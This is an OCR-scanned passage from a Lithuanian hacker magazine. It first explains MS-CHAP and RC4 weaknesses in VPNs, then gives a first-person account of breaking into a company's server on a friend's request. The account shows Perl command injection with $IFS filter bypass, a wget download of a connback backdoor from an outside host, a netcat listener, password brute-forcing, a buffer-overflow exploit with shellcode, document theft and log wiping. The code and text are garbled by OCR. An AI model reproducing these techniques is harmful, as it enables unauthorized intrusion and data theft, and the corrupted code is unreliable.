mas nereikalauja gremėzdiškų paskaičiavimų, todėl su šiuolai- 
kiniais procesoriais LM hešas gali būti nulaužtas per gana trumpą 
laiką. Kokį — nesvarbu. Juk jis vis tiek nėra perduodamas atviru 
pavidalu. Tiesa, parinktas slaptažodis gali praversti jungiantis į 
sistemą, kai slaptažodis renkamas su klaviatūra. 

O štai taip apskaičiuojamas NT hešas: 

1. Priklausomai nuo sistemos nustatymų, kliento slaptažodis 
transformuojamas į 14 (pagal nutylėjimą) arba į 128 ASCII sim- 
bolių eilutę; beje, daugelis administratorių naudoja ilgį pagal 
nutylėjimą ir nepasistengia jo pakeisti. 

2. ASCII eilutė transformuojama į UNICODE. 

3. Pagal md4 algoritmą apskaičiuojamas 16 baitų hešas. 


Kaip matyti, NT hešas kur kas atsparesnis, todėl NT hešo atve- 
ju hakeriai pirmenybę teikia paties hešo, o LM atveju — pradi- 
nio slaptažodžio perrinkimui. 

Dabar pažiūrėsime, kaip veikia autentifikacijos procedūra. Pa- 
prastai ji įgyvendinama arba pagal MS-CHAP v1 arba MS-CHAP 
v2 protokolą. Pradėsime nuo pirmojo, kuris veikia taip: 


1. Klientas VPN serveriui pasiunčia autentifikacijos užklausą, 
atvirai perduodamas savo login. 

2. Serveris grąžina 8 baitų atsitiktinį atsakymą. 

3. Klientas sugeneruoja savo slaptažodžio LM hešą ir generuo- 
ja tris DES raktus. 

4. Kiekvienas šių raktų užšifruoja atsakymą, po ko gaunamos 
trys 8 baitų eilutės. 

5. Trys 8 baitų eilutės apjungiamos į vieną 24 baitų eilutę, kuri 
perduodama serveriui. 

6. Serveris iš savo duomenų bazės išgauna šio kliento hešą ir 
dešifruoja eilutę. 

7. Jeigu dešifravimo rezultatas sutampa su pradiniu atsakymu, 
tai viskas ok, ir atvirkščiai. 


O štai kaip veikia MS-CHAP v2: 

1. Klientas VPN serveriui pasiunčia autentifikacijos užklausą, 
atvirai perduodamas savo /ogin 

2. Serveris grąžina 16 baitų atsitiktinį atsakymą. 

3. Klientas generuoja 16 baitų PAC (Peer Authenticator Chal- 
lenge) 

4. Klientas į vieną eilutę apjungia PAC, serverio atsakymą ir 
savo vartotojo vardą. 

5. Iš gautos eilutės pagal SHA-1 algoritmą sugeneruojamas 8 
baitų hešas, kuris pasiunčiamas serveriui. 

6. Serveris iš savo bazės išgauna šio kliento hešą ir dešifruoja 
jo atsakymą. 

7. Jeigu dešifravimo rezultatas sutampa su pradiniu atsakymu, 
tai viskas ok, ir atvirkščiai. 

8. Vėliau serveris ima kliento PAC ir hešo pagrindu generuoja 
20 baitų AR (Authenticator Response), kuris perduodamas klien- 
tui. 

9. Klientas atlieka tą pačią operaciją ir gautą AR sulygina su 
serverio atsakymu. 

10. Jeigu viskas sutampa, serveris autentifikuoja klientą. 


Kaip matome, MS-CHAP v2 protokolas atrodo labiau apsaugo- 
tas, nei MS-CHAP vi, tačiau abu jie pažeidžiami. Detales gali- 
ma rasti Briuso Šnaierio straipsnyje Cryptanalysis of Microsoft's 
MS CHAP v2 (www.schneier.com/paper-pptpv2.html), kuriame 
nepaisant pavadinimo aprašomas ne tik MS-CHAP v2, bet ir 
MS-CHAP vi. 
Kuo gi blogas MS-CHAP v1? Tuo, jog jį jau seniai visi išmoko 
laužti. Internete galima rasti daugybę gatavų „visrakčių“, vei- 
kiančių visiškai automatizuotu režimu ir nereikalaujančių jokios 
kvalifikacijos. Parsisiuntei — paleidai — gavai. Pats žymiausias 
(ir seniausias!) — tai LOphtcrack, tačiau dabar projektas perva- 
dintas į LC 5 (www.securityfocus.com/tools/1005), o ankstes- 
niu Www.lOphtcrack.com adresu atsidaro pardavimo skelbimas. 
Nepaisant to, LOphtcrack vis dar išlieka rikiuotėje, kadangi prie- 
šingai nei pinigų trokštantys LC 5, jis platinamas nemokamai. Jį 
surasti galima bet ku- 


protokolas šifravimo metodas rioje hakeriškoje sve- 
senas MPPE RSA RC4, 40-, 56 bitų raktai tainėje. | 

naujos MPPE RSA RC4, 128 bitų raktai Su 3 GHz dažnio Pen- 
IPSec DES, 56 bitų raktai tium 4 procesoriumi 
IPSac Triple 3DES pilnas perrinkimo ciklas 


truks ne daugiau 4 va- 
landų, o slaptažodis vi- 
dutiniškai parenkamas 


Pagrindiniai VPN susijungime 
naudojami hešavimo ir autentifikacijos algoritmai 


41) 


[HAKERIS 


42) 


[HAKERIS 


per 2 valandas. Še tau, kad nori, ir saugumas! Ir tai dar ne 
viskas! Iš esmės LOphterack buvo paprasčiausias perrinkiklis, 
veikiantis grubios jėgos principu (lieps kasti kasiu). Tai ne- 
elegantiška ir nenašu. 

2004 metų pradžioje dvidešimtmetis šveicarų hakeris Filipas 
Ošlinas (Philippe Oechslin), vyriausiaiss mokslinis Šveicarijos 
valstybinio technologinio instituto Lozanoje kriptografijos ir ap- 
saugos laboratorijos asistentas, pranešė apie iš esmės naują 
pagreitinto laužimo metodą (Faster Time-Memory Trade-Off Tech- 
nigue), pagrįstą iš anksto apskaičiuotomis lentelėmis, kuriose 
saugomos visos įmanomos slaptažodyje panaudotų simbolių 
kombinacijos. Remdamasis Martino Helmano (Martin Hellman) 
darbais, Filipas perdarė ir sustiprino slaptažodžių parinkimo al- 
goritmą, „adaptavęs“ jį LM algoritmui. Nulaužimo laikas sutrum- 
pėjo —12 kartų ir AMD 2500+ kompiuteryje su 1,5 Gb RAM 
siekė vos 13,6 sekundžių! Tiesiog laužimas realiu laiku! O juk 
tai toli gražu ne pats galingiausias prieinamas kompiuteris. De- 
rėtų pastebėti, jog atminties kiekis svarbus todėl, kad iš anksto 
apskaičiuotos lentelės labai didelės, o intensyvus perkėlimas į 
diską (swaping) žiauriai sumažina našumą. 

Visas detales galima rasti Filipo straipsnyje, kuris pateiktas švei- 
cariškoje svetainėje (lasecwww.epfl.ch/php code/publications/ 
search.php?ref=Oech03), o visa tai įgyvendinta programoje 
Rainbow Crack (www.antsight.com/zsl/rainbowcrack), kurios de- 
monstracinė versija platinama nemokamai, kai už pilną iš anksto 
apskaičiuotų lentelių versiją teks pakloti 500 dolerių. Šiaip jau 
jas internete galima rasti ir nemokamai, tačiau čia yra vienas 
„bet“. Darbui su jomis prireiks įdiegti 60 gigabaitų operatyvinės 
atminties. Namų kompiuteriai tokių apimčių neįkanda. Tai jau 
neprasta serverinė konfigūracija, kurios fone 500 dolerių tie- 
siog nublanksta. Tačiau ir slaptažodis nulaužiamas akimirksniu! 
Beje, ne tik LM, bet ir NT. Taigi kriptografija nestovi vietoje, o 
slaptažodinių apsaugų patikimumas kasmet kelia vis daugiau ir 
daugiau abejonių. 


[VPN tinklų tyrimas] Daugelis kompanijų nepageidauja afišuoti 
savo tinkle esančio VPN serverio. Ir tai teisingai, kadangi prak- 
tiškai nė viena VPN realizacija nesugebėjo išvengti programuo- 
tojų klaidų, o per pastaruosius keletą metų buvo aptikta daugy- 
bė skylių, tačiau jas išnaudoti ne taip jau paprasta! Visų pirma, 
reikia išsiaiškinti VPN serverio IP adresą, antra, kažkaip nusta- 
tyti programinės įrangos tipą ir realizacijos versiją. 

Štai tam ir reikalingas /KE-scan! Tai nemokamai platinamas 
įrankis, per UDP siunčiantis Control Connection užklausas ir ana- 
lizuojantis atsakymus. Kaip parodė praktika, kiekviena realiza- 
cija turi unikalų „parašą“, kuris žargone vadinamas „antspau- 
du“ (fingerprint), pagal kurį ir galima ją nustatyti. Antspaudų 
nuėmimo metodika nuolat tobulėja, o išsamesnės informaci- 
jos geriau ieškoti pas pačius kūrėjus (www.nta-monitor.com/ 
ike-scan/overview-old.htm). Iš ten galima parsisiųsti ir gatavą 
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įrankį su papildomai pateikiamais išeities tekstais: www.nta 
monitor.com/ike-scan/download.htm. Kaip ir daugelis kitų šio 
tipo programų, ji orientuota į *nix tipo operacines sistemas, bet 
neblogai jaučiasi ir Windows sistemoje, Cygwin aplinkoje. Kai 
kurie distributyvai (pavyzdžiui, Debian) jį jau įtraukia į pagrindinį 
pateikiamą komplektą, todėl čia nereikia nieko siųstis. 


Tačiau tai ne vienintelė silpna MS-CHAP v1 vieta. Yra ir kitų. 
Pavyzdžiui, atakuojantysis gali apsimesti serveriu ir klientui pa- 
siųsti slaptažodžio pakeitimo užklausą, kuriai nereikia autentifi- 
kacijos ir kuri bus suprasta kaip teisinga. Kaip jau buvo parody- 
ta, serverio autentifikacijos pas klientą galimybė atsirado tik 
MS-CHAP v2 protokole. Klientas įveda savo seną ir naują slap- 
tažodį, atakuojantysis juos sėkmingai „suvalgo“ ir, panaudoda- 
mas „seną“ slaptažodį, tuojau pat prisijungia prie serverio. Kaip 
sakoma, komentarų čia nereikia. Juk jeigu „slaptažodžio bloka 
vimas“ atjungtas ir nurodytas neribotas jo naudojimo laikas, tai 
slaptažodžio pakeitimo užklausa atrodys pakankamai keistai, 
gal net įtartinai, o štai jeigu slaptažodžiai keičiami kas keletą 
dienų, tai prie to priprantama ir į tai nustojama kreipti dėmesį. 
MS-CHAP v2 protokolas kur kas labiau apsaugotas, su juo jau 
nesuveikia serverio „suklastojimo“ pokštas, tačiau jis lieka pa- 
žeidžiamas Rainbow Crack tipo įrankiams, kurie ji nulaužia per 
labai trumpą laiką, tiesa, su sąlyga, kad hakeris turi pakanka 
mą operatyvinės atminties kiekį ir keletą papildomų valandu :). 


[Šifravimas išorėje ir viduje] Viskas, apie ką mes iki šiol kalbė- 
jome, buvo susiję su autentifikacija. Dabar pabandykime pa- 
kalbėti apie šifravimą. Šiuo metu palaikomi du šifravimo meto- 
dai: MPPE (Microsoft Point-to-Point Encryption) ir IPSec. Pirma- 
sis protokolas apibrėžtas RFC 3078 dokumente, o /PSec apra- 
šo ištisas RFC tandemas: RFC 1825 -— IP Security Architecture, 
RFC 1826 IP Autentication Header, RFC 1827 IP Encapsula 
ting Security Payload, ESP RFC 1828 — IP Autentication using 
Keyed MD5, RFC 1829 — ESP DES-Cypher Block Chaining Trans 
form. Be to, egzistuoja ir kiti IPSec RFC, kuriuos galima lengvai 
rasti www.rfc-editor.org svetainėje. Tai ištisas talmudas, su ku- 
riuo akiniuotų vaikinų minia nesuspėtu susidoroti nė per metus! 
Abu protokolai įgyvendinti tiek Microsoft Windows, tiek ir ki- 
tose sistemose (pavyzdžiui, *BSD), tačiau VPN darbo algorit- 
mai gali iš esmės skirtis. Pagrindiniai duomenys pateikti ant- 
roje lentelėje. 


LM hešo apskaičiavimo procedūra 


Šifravimo metodo parinkimą apibrėžia VPN serverio tipas ir kon- 
figūracija. Prisijungus per PPTP naudojamas MPPE šifravimas, o 
prisijungus per L2TP (Layer 2 Tunneling Protocol) — IPSec šifra- 
vimas. L2TP protokolą sukūrė /ETF PPP Extensions darbo grupė, 
siekdama apjungti Cisco L2F funkcionalumą, be to, PPTP 1999 
metais standartizuotas RFC 2661 dokumente. Dabar jis inten- 
syviai diegiamas. Išoriškai L2TP labai panašus į PPTP bet jeigu 
PPTP veikia tik IP tinkluose, tai L2TP palaiko Frame Relay, X.25 
ir ATM. 

Jeigu Microsoft VPN klientas sukonfigūruotas automatiškai pa- 
sirinkti serverio tipą (kaip ir vyksta pagal nutylėjimą), tuomet iš 
pradžių bandoma panaudoti L2TP protokolą su /PSec šifravimo 
algoritmu, o jeigu šis bandymas baigiasi nesėkmingai, pereina- 
ma prie PPTP sų MPPE šifravimu. 

Aptarsime PPTP kaip paprasčiausią ir labiausiai paplitusį 
šifravimo protokolą. Hakerių požiūriu jis patrauklus tuo, kad 
naudoja paprastą srautinį šifrą RC4, kurio pažeidžiamumai 
gerai žinomi. Per pastaruosius keletą metų kriptoanalitikai 
sukūrė daugybę efektyvių atakų, o skaičiuojamoji galia iš- 
augo taip, kad net tiesmukas 40 bitų rakto parinkimas yra 
paprastutė smulkmena. Išvardinsiu tris pagrindinius RC4 pa- 
žeidžiamumus: 

1. Ataka atviru tekstu. Šifravimo rakto pagrindu generuojama 
pseudoatsitiktinė seka (kitaip vadinama gama), kuri suXOR'i- 
nama su šifruojamu tekstu. Kas gali būti paprasčiau! Jeigu 
atakuojantysis žino šifruojamo baito turinį ir poziciją, tai pa- 
kartotinai pritaikius XOR jis gali atstatyti vieną gamos baitą. 
Kadangi šifruojamuose paketuose saugoma nuspėjama infor- 
macija (pavyzdžiui, antraštės), o vienos ir tos pačios gamos 
sritys daug kartų uždedamos ant skirtingų šifruojamo teksto 
sričių, hakeris gali atstatyti visą gamą paprasčiausiai kaupda- 
mas tinklo srautą! 

2. „Bitų pervertimo“ ataka (bit-flipping attack). Po pradinės au- 
tentifikacijos ir susijungimo užmezgimo likę paketai nėra au- 
tentifikuojami, todėl atakuojantysis gali laisvai pakeisti užšif- 
ruotų bitų turinį. Konkreti ataka gali atrodyti štai taip: hakeris su 
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Bit-flipping tipo ataka 


sniferiu perima šifruotą paketą, pakeičia keletą paketo bitų ir 
perskaičiuoja jo CRC, po ko perduoda paketą serveriui, kuris 
sėkmingai „sukramto“ padirbtą paketą (juk CRC apskaičiuotas 
teisingai) ir perduoda jį į tolimesnį protokolų steko lygį. Trečia- 
me lygyje (layer 3) patiriama konkreti nesėkmė. Paketas atme- 
tamas ir generuojamas ganėtinai nuspėjamas atsakymas, kuris 
perduodamas „į viršų“, kur jis užšifruojamas. Hakeris perima 
užšifruotą paketą ir panaudoja atviro teksto ataką, atstatyda- 
mas rakto gamą. Viskas! Dabar likusieji paketai dešifruojami 
be jokių problemų! 

3. Ataka resinchronizuojant: jeigu perdavimo metu praran- 
damas paketas arba ateina paketas su neteisingu MPPE 
antraštėje esančiu numeriu, įvyksta taip vadinama „rakto 
resinchronizacija“. Siuntėjas reinicializuoja RC4 lenteles ir 
MPPE antraštėje nustato „numetimo“ (flushed) bitą. Jeigu 
sistema pakete aptinka nurodytą „numetimo“ bitą, ji reini- 
cializuoja savo RC4 lenteles ir priklausomai nuo gautos reikš- 
mės priskiria paketų skaitiklį. Praktiškai tai reiškia, kad šif- 
ravimas su gama prasideda iš pradžių. Jeigu hakeris bom- 
barduos auką resinchronizacijos užklausomis (o joms ne- 
reikia jokios autentifikacijos), tai visi paketai bus šifruojami 
su viena ir ta pačia gama, kas žymiai supaprastina atviro 
teksto ataką. 


Visos trys aprašytos atakos tinka MS-CHAP v1, o MS-CHAP v2 
protokole jų poveikis žymiai susilpnėjo, todėl pagrindiniu lauži- 
mo būdu tapo slaptažodžio parinkimas su Rainbow Crack tipo 
programomis. 


[Pabaiga] Tai vis dėlto galima pasitikėti VPN tinklais, ar ne? 
Atsakymas nevienareikšmiškas. Taip, tai iš tiesų yra papildo- 
mas virš tradicinių tinklų esantis apsaugos lygis, tačiau suteikti 
priėjimą į vidinį korporatyvinį tinklą per VPN labai pavojinga. Ha- 
keris nesunkiai slaptažodį gali parinkti per tokį trumpą laiką, 
kad administratorius nespės nė mirktelėti. Tokio įsilaužimo pa- 
sekmes gali suprasti pats. Čia lakios vaizduotės nereikia. 
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Naktinis bombardavimas 


LAIKRODIS RODO 4 RYTO, UŽ LANGO — 
TAMSA, ŠALTIS, SNINGA, MONITORIUJE MIR- 
GA UŽSIKROVUSIŲ LANGINIŲ LOGOTIPAS, 
O MANO NEBLAIVOJE GALVOJE BRĘSTA LI- 
KUSIOS NAKTIES PLANAS: VISIŠKAI RIM- 
TAI, MAN NORISI PRAMANKŠTINTI PIRŠTUS 
IR NULAUŽTI KOKĮ NORS RIMTĄ INTERNE- 
TINĮ PROJEKTĄ. AŠ NARŠYKLĖJE SUKONFI- 
GŪRAVAU ŠVIEŽIĄ ANONIMINĮ PROXY SER- 
VERĮ IR LEIDAUSI IEŠKOTI SAVO BŪSIMOS 
AUKOS. 


Ziauri tinklo ataka 

Spustelėjęs ant kažkokios nuorodos, pakliuvau į aparatūros sve- 
tainę, ir mano dėmesys kurį laiką persijungė į gražius įrengį- 
nius, kurių paveiksliukai mane nuteikė labai pozityviai. Aš skai- 
čiau vaizdo plokščių apžvalgas, peržiūrinėjau sisteminių plokš- 
čių konfigūracijas ir apgalvodavau kainas, kai staiga dešiniaja- 
me apatiniame ekrano kampe kažkas sumirksėjo — atėjo pra- 
nešimas nuo mano gero bičiulio. Draugelis manęs prašė pagal 
bos viename nepaprastame reikale. Jam reikėjo nulaužti popu- 
liarios kompiuterių firmos (kurios pavadinimas tegu lieka pa- 
slaptyje) serverį ir iš jo pasiimti nuo pašalinių akių paslėptus 
duomenis. Kaip pasakojo mano pažįstamas, reikiami dokumentai 
prieinami tik iš lokalaus organizacijos tinklo per SMB ir yra slap- 
tažodžiu apsaugotame resurse. Dėl to parsisiusti reikiamas by- 
las iš išorės per kokį nors elementarų web pažeidžiamumą bu- 
vo neįmanoma. Taigi panašu, kad reikės šioje mašinoje gauti 
root teises. 

Aš šiam žmogui buvau skolingas, be to, jo pasiūlymas mane 
sudomino ir techniniu atžvilgiu ne kasdien tenka laužti rimtų 
kompanijų projektus. Taigi aptaręs keletą su dominančiais do- 
kumentais susijusių niuansų aš perėjau prie aktyvių tinklo re- 
surso nulaužimo veiksmų. 


[Nesportiškas įsilaužimas?] Visų pirma aš nusprendžiau nu 
skenuoti organizacijos svetainę (pavadinsiu ją Www.example.org) 
iš užsienyje esančio shello su nmap stealth-scan režimu. Pa- 
aiškėjo, kad serveryje priėjimui iš išorės atidarytas minimalus 
jungčių rinkinys, todėl buvo akivaizdu, kad administratorius nor- 
maliai sukonfigūravo ugniasienę. Ugniasienė taip pat negai- 
lestingai atmetinėjo visą ICMP srautą į Mano pasiųstą ping 
neatsakė nė vienas paketas. Pagal viską susidarė įspūdis, kad 
šio serverio administratorius protingas žmogus, kuris nor- 
maliai sukonfigūravo ugniasienę, dar daugiau, standartinių ser- 
verių, į kuriuos buvo atidarytas priėjimas iš interneto, antraštės 
parodė, kad demonų versijos buvo reguliariai atnaujinamos, kas 
reiškė, jog adminas domisi naujienomis. Tuomet aš nuspren- 
džiau įsižiūrėti į organizacijos svetainę ir ten paieškoti pažei- 
džiamų skriptų galbūt ten yra koks nors senas forumas arba 
kokia nors kita pažeidžiama sistema. 


[Šiek tiek ekstremalumo] Deja, svetainėje nebuvo nė vieno 
viešo web skirto varikliuko, ir iš viso, Kaip paaiškėjo, čia iš eS- 
mės nebuvo pažeidžiamų skriptų. Viskas veikė kaip laikrodu- 
kas: valdymo reikšmės skriptams buvo perduodamos skaičių 
pavidalu (www.example.org/about.php?param=32), o iš jų 
reikšmių buvo korektiškai nufiltruojami visi specialūs simboliai, 
t.y. apie kokią nors SOL injekci- 
ją čia net nebuvo galima pagal- 
voti. Nenorėdamas ilgai žaisti aš 
užėjau į g00gle.com ir paprašiau 
jo surasti man visus CGI ir PHP 
skriptus: inurliwww.example.org 
filetype:CGI/PHP. Tačiau nė vie- 
nas mano surastas skriptas ne- 
pasidavė mano blogai įtakai: vi- 
sas programas parašė patyrę 
programuotojai, todėl jose ne- 
buvo matomų klaidų. Ir tuomet 


aš prisiminiau reverse IP lookup ataką, apie kurią buvo rašoma 
rugsėjo mėnesio numeryje (][.28), straipsnyje „Smūgis Per We- 
ba“. Tikrai, juk visai įmanoma, kad ši svetainė turi kaimynų: 
nors mašina visiškai priklausė laužiamai organizacijai, greičiau- 
siai šiame serveryje veikė ir kiti draugiški projektai. Taigi aš nu- 
sprendžiau išbandyti reverse /P lookup. 


[Užsuksim pas kaimynus] Nežinantiems paaiškinsiu, jog šis 
metodas pagrįstas informacijos apie visus virtualius serverius, 
kurie yra tame pačiame serveryje kartu su atakuojamuoju resur- 
su, gavimu. Šios informacijos gavimo tikslas — nulaužti vieną iš 
kaimynų svetainių ir po to panaudoti šį placdarmą tolimesniam 
įsiskverbimui. Taip aš ir pasielgiau: užėjęs į www.domainsdb.net, 
aš formoje įvedžiau resurso adresą ir vietoje atsakymo gavau dvi 
svetaines: www.target.com ir www.hackme.net. Norint judėti to- 
liau, reikėjo nulaužti vieną iš jų. Kadangi mano sąraše pirmoji 
buvo www.target.com, aš iš pradžių ėmiausi būtent jos, tačiau 
po 15 minučių supratau, kad čia nėra nė vieno skripto, todėl 
nieko gero nenusimato. Tuo tarpu hackme.net atrodė kur kas 
patraukliau, 0 viduje kažkas kuždėjo — aš einu teisingu keliu. 


[Povandeniniai akmenys] Aš gana greitai suradau pažeidžia- 
mą skriptą. Vos tik pamačiau www.hackme.net/company/colle- 
agues/whois.pl?image =semike.jpg tipo nuorodą, mano veidą 
papuošė šypsena ir aš supratau, kad intuicija manęs neapga- 
vo. Nežinojau, kaip būtent atsidaro ši byla, todėl išbandžiau 
įvairius tolimesnės atakos variantus. 

Iš visų mano išbandytų variantų laukiamo pasisekimo sulaukė 
tik viena užklausa: www.hackme.net/company/colleagues/ 
whois.pl?image=Is|. Po šios užklausos serveryje buvo įvykdyta 
komanda Is. Po keleto sekundžių aš jau žinojau, kad web ser- 
veris veikia vartotojo nobody vardu, tačiau sužinoti sistemos ver- 
sijos nepavyko: man įprasta komanda uname -a negalėjo būti 
įvykdyta. Greičiausiai adminas filtravo tarpus ir neleido progra- 
mai apdoroti tokių eilučių. Atėjo laikas filtravimus apeiti. Aš nu- 
sprendžiau vietoje tarpo pabandyti įterpti aplinkos kintamąjį ŠIFS, 
tuo pačiu gaučiau progą pasimokyti vykdyti Perl kodą. Mano spė- 
Jimas pasitvirtino, todėl paleidęs www.hackme.net/company/col- 
leagues/whois.pl?image =uname$IFS-a|, aš gavau visus duo- 
menis apie įdiegtą sistemą — tai buvo paskutinis Linux su pa- 
taisymais, kuriam dar nebuvo sukurta eksploitų. Ką gi, teks Su- 
kelti privilegijas rankiniu būdu :). 


Aš nusprendžiau į serverį persiųsti connback bekdora, juo Ia- 
biau kad serveryje buvo įdiegtas wget. Peržiūrėjau ASCII lentelę 
ir sužinojau mano tolimesnei atakai reikalingų simbolių kodus: 
brūkšnys (45), slešas (47), vienguba kabutė (39) ir vertikalus 
brūkšnys (124), 
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Reverse ip lookup ataka 


Brutforseris Hydra -— nuostabus lokalių įsilaužimų pagalbininkas 


Tai padaryti reikėjo tam, kad apeičiau filtravimą: netinkama sim- 
bolį buvo galima lengvai pakeisti su Perl konstrukcija chr(SIM- 
BOLIO KODAS), perdavus šią eilutę Perl interpretatoriaus vyk- 
dymui: 


www.hackme.net/company/colleagues/whois.pl?image — "perlSIFS-e 
SIFS“ printSIFS.chr(39).wgetSIFSinfectors-host.orą.chr 
(39).chr(47).connback.cŠIFS.chr(45).0"chr(47)./tmp'.chr(47)./connback.c.chr(39)" | 


Taip aš persiunčiau bekdorą ir sukompiliavau jau įdiegtą GCC: 


www.hackme.net/company/colleagves/whois.pl?image = "perlŠIFS- 
eŠIFS“ printSIFS.chr(39) .gccSIFSconnback.cSIFS.chr(45).SIFS.chr(47). 
tmp.chr(47).connback.chr(39)" | 


Programa buvo sukompiliuota sėkmingai ir aš ją paleidau, bek- 
dore prisijungimui nurodęs 80 jungti, kad griežta ugniasienė 
praleistų susijungimą. Po to aš savo kompiuteryje ant 80 jung: 
ties paleidau netcat ir pradėjau laukti prisijungimo: 
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Pažeidžiamų skriptų paieška svetainėje baigėsi nesekmingai 


45) 


[HAKERIS 03 [34] 06 


46) 


[HAKERIS 


n 1 —p 80 


Bekdoras sėkmingai susijungė, ir aš gavau priėjimą prie pilna- 
vertiškos komandinės aplinkos. 


[Duokit rootą po bruto] Gauti shellą — tai reiškia gauti ir /etc/ 
passwd bylą. Aš gavau slaptažodžių bylą (cat /etc/passwd), įdie- 
giau unikalų THC komandos sukurtą brutforserį Hydra (apie šį 
brutforserį mes rašėme rugpjūčio mėnesio žurnalė) ir pradėjau 
laužti sisteminių vartotojų slaptažodžius. Aš nulaužiau viso labo 
du slaptažodžius, tačiau mano gautų sisteminių įrašų galimy- 
bės buvo apribotos. Tačiau net ir lokalios privilegijos — tai jau 
neblogai, todėl mano šansai įsilaužti smarkiai išaugo. 


[Netikėtas įvykių posūkis] Deja, visos history bylos, kurias tik 
sugebėjau surasti (.bash history, .mysąl history) nedavė nieko 
gero, tačiau aš perskaičiau Attpd.conf ir lengvai sužinojau kelią 
iki www katalogo. Greitai aš suradau kažkokios PHP sistemos 
*.inc bylą, kurioje aptikau informaciją susijungimui su MySOL 
duomenų baze. Šie slaptažodžiai tiko MySOL, bet prisijungti prie 
FTP ir SSH man su jais neleido. Kiek aš supratau, administra- 
torius visiems resursams priskyrė skirtingus slaptažodžius, kas 
vėlgi byloja jo kvalifikacijos naudai. Kaip jau minėjau, serveryje 
veikė užlopyta Linux, sisteminių demonų versijos taip pat buvo 
stabilios ir atrodė, kad sukelti privilegijų neįmanoma. Bet aš 
nepasidaviau ir pradėjau nuodugniai tyrinėti sistemą. Serveryje 
veikė krūva IDS — PortSentry, Chrootkit ir Snort. Derėjo būti 
atsargesniam. Komanda last -10 bylojo apie tai, kad adminas 
reguliariai jungdavosi į sistemą. Peržiūrėjęs sistemos procesus 
(ps -ax), aš pastebėjau vieną pažįstamą procesą — sysad3. 
Apėmė toks jausmas, kad aš jį kažkur jau mačiau. Iš tiesų, aš 
jau buvau sutikęs šią programą viename serverio kataloge, kur 
jis gulėjo C išeities teksto pavidalu. Parsisiuntęs šią bylą supra- 
tau, kad adminas tuo pačiu yra ir programuotojas. Jis sukūrė 
savo darbo įrankį, kuris stebėjo sistemos būklę, tačiau buvo dar 
ganėtinai neišbaigtas. Skaitydamas šio įrankio išeities teks- 
tus, jame suradau klaidą — buferio perpildymą, kas man 
buvo iš tiesų netikėta. Juk visa tai galėjo sistemoje duoti neri- 
botas veikimo galimybes, kadangi programa buvo paleista ro- 
ot teisėmis — teliko parašyti protingą shel/-kodą ir gauti ab- 
soliučias sisteminės teises. 


[Ne namas ir ne gatvė] Pabandykime prisiminti, kas gi yra 
pagrindinis sėkmės faktorius buferio perpildymo atakose? Tei- 
singai, korektiškas grįžimo adreso pakeitimas tuo, kuriuo yra 
hakerio patalpintas vykdomasis kodas — pavyzdžiui, koman- 
dinio interpretatoriaus su root teisėmis paleidimo funkcija. 
Būtent tai ir buvo mano tikslas. Dabar aš tau papasakosiu, 
kaip man pavyko parašyti savadarbei admino programai skir- 
tą eksploitą. Jeigu buffer overflow — skylė tavo žiniose, tai 
siūlyčiau perversti senesnius mūsų žurnalo numerius, nes 
apie tai ne kartą buvo rašyta. Visų pirma kad tu geriau įsi- 
vaizduotumei, apie ką kalbama, aš tau parodysiu pažeidžia- 
mo kodo fragmentą: 


Pažeidžiamas „butove.c“ kodas 
char *env: 

char buf[100]; 

env = getenv(“RAMOPTIME"); 


if (env == NULL) 4 retum O; ) 
sprint(buf, "Vos", env); 
return O; 


Lengva suprasti, kad šis kodas su funkcija getenv() nuskaito 
aplinkos kintamąjį RAMOPTIME, o po to nuskaitytą eilutę įrašo į 
buferį buf (char buf[100]). Čia viskas labai paprasta, o pažei- 
džiamumas tiesiog akivaizdus. Po to aš su štai tokiu kodu į 
RAMOPTIME įrašiau tūkstantį raidžių A (kodas 0x41): 


bufove2uze.c 
int main(int arge, char "argv[]) 


( 

char buf[1000]; 

memset(buf, 0x41, 1000); 
setenv(“RAMOPTIME", but, 1); 
execl(“env“, “env", NULL); 


) 


Kitame savo serveryje su gcc sukompiliavęs šias programas, aš 
jas įvykdžiau ir įsitikinau, kad įvyko perpildymas: pasirodė stan- 
dartinis Unix pranešimas — Segmentation fault (core dumped). 
Viskas, dabar atėjo laikas sukurti šiai programai skirtą eksploitą 
ir atakuojamoje mašinoje gauti root teises. 

Shell-kodas su smokingu 

Nereikia būti lingvistikos genijumi, kad suprastum: Segmenta- 
tion fault (core dumped) reiškia tai, kad įvyko perpildymas ir 
kad į diską įrašytas nulūžusio proceso atminties turinys (memo- 
ry dump). Su derintuvu gdb galima atidaryti šią bylą ir gauti kai 
kuriuos papildomus duomenis: 


S gdb core proc.core 

Core was generated by "AAAA". 

Program terminoted with signal 11, Segmentation fault. 

warning: current sos: Can't read pathname for load map: Input/output error 
Reading symbols from /liby/'tls/libc.50.6...done. 

Loaded symbols for Alib/tls/libc.s0.6 

Reading symbols from /lib/ld-linux.s0.2...done. 

Loaded symbols for /lib/td-linux.s0.2 


Nulūžusio proceso core dump 


+ 0 0x36333135 in ?? () 
/ 0x36333135 — išgalvota ;) 


Toliau man reikėjo išsiaiškinti grįžimo į shell-kodą adresą. Tam 
aš žvilgtelėjau į ESP registrą: 


100x SESP 
Oxcff1 0: 0x36333135 0x36333135 0x36333135 0x36333135 


Ordi310: 0436333135 0x36333135 0x36333135 0x36333135 // Štai jis! 


Viskas, dabar man lieka tik parašyti eksploitą. Aš tai padariau 
gana greitai, o dabar parodysiu tau paprastą jo kodą: 


Poruoštas eksploitas 

char shellinfector[] 

AT OT db bO 1 7 ed BO“ 
B eOV 5068 227368" 

"68 262469 be 489 3450" 

53489 e 99 YbO Ob cd BO", 
int main(int arge, char "argvf]) 


long RET; 
m; 


char buf[1000]; 


char "p; 
RET — Oxdif310; 
p = bul; 


memset(buf, 0x41, 1000 + 1-strlen(shellinfector)); 
sprintf(huf + 1000-+ 1-strlen(shellinfector), "Vos", shellpre); 
fr (i = i <= 500; += 4) 

"(long*)(p+i) = RET; 

setenv(“RAMOPTIME", buf, 1); 

gxad("env“, "env“ , buf, NULI); 


Čia shellinfector — tai mašininis kodas, kuris įvykdomas eina- 
mo proceso teisėmis, mano atveju — root vardu. Aš tiesiog 
paleidau komandų interpretatorių. 

Pabaigęs eksploitą aš jį sukompiliavau ir paleidau laužiamoje 
mašinoje, po ko akimirksniu gavau absoliučias serverio valdy- 
mo teises. Neilgai galvojęs, aš su /ocate suradau reikiamus 
dokumentus, suspaudžiau juos į vieną tgz archyvą ir persiun- 
čiau per httpd, išvaliau logus ir jau ruošiausi pamiršti visą Šią 
istoriją. 


[Pozicijų įtvirtinimas] Vis dėlto man buvo gaila tiesiog pa- 
